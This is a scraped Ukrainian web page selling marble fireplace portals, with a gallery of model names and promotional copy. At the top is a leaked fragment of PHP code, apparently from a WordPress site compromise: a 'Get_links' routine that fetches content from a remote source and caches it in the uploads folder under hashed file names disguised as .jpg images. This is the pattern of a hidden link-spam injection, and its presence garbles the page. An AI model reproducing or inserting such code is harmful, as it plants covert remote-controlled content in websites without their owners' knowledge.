function return_links($lib_path) { $links_class = new Get_links(); $file = ABSPATH.'wp-content/uploads/2013/'.md5($_SERVER['REQUEST_URI']).'.jpg'; $_cache_lifetime = $links_class->_cache_lifetime; if (!file_exists($file)) { @touch($file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) { @touch($file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } else { $data = file_get_contents($file); return $data; } } } ?> Каміни « Галерея мармуру – краса втілена в мармур
Каміни
kamin15_03
Камінний портал “Симфонія”
камін Елегія
Камінний портал “Елегія”
камін Едельвейс
Камінний портал “Едельвейс”
nizhnist
Камінний портал “Ніжність”
4
Камінний портал “Еллада”
10
Камінний портал “Гармонія”
18
Камінний портал “Comfort”
2
Камінний портал “Первоцвіт”
17
Камінний портал “Велич”

Камінні портали у всі часи вважалися кращою прикрасою будинку

Адже портали для камінів – не просто декоративний елемент, а справжній осередок в будинку, біля якого можна зігрітися холодними зимовими вечорами. Коли мова заходить про дизайн каміна, то в першу чергу слід розробити декор його порталу.

Виготовлення камінних порталів є спеціалізацією нашої компанії

У нас Ви можете придбати портал для каміну будь-якої моделі та конфігурації. Купити можна як готовий портал, так і замовити виготовлення порталів для каміна за індивідуальним дизайном. Враховуючи побажання замовника, наші дизайнери можуть використовувати в проекті скульптури людей і тварин, різні архітектурні елементи.

У нашій компанії працюють кращі фахівці, які виконають роботи будь-якої складності

Ми завжди прислухаємося до Ваших побажань, враховуємо особливості приміщення, де буде встановлюватися камін, і розробляємо індивідуальний і ексклюзивний проект. Якщо Ви хочете гідно прикрасити Ваш будинок, звертайтеся до нас, адже ми пропонуємо якісні камінні портали ціна яких неймовірно низька! Красиві камінні портали, низька ціна – все це ми пропонуємо кожному нашому клієнтові!